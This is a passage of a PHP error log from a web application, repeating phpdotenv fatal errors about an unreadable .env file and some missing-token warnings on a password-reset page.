Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:07:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:07:42 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:08:10 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:09:13 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:10:15 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:22:15 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:23:10 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:24:03 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:24:55 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:25:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:25:13 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:25:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:26:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:27:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:04:38 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:04:38 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:05:22 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:05:23 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:07:14 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:07:15 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:07:41 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:07:42 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:07:57 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:07:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:08:21 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:08:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:08:44 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:08:44 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:10:20 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:10:20 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:11:02 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:11:03 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 09:37:16 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:37:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:40:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:40:50 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:40:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:41:16 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:41:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:42:31 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:42:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:10:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 13:36:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 13:36:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:00:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:00:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:00:50 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:00:54 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:04:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:04:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:04:20 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): 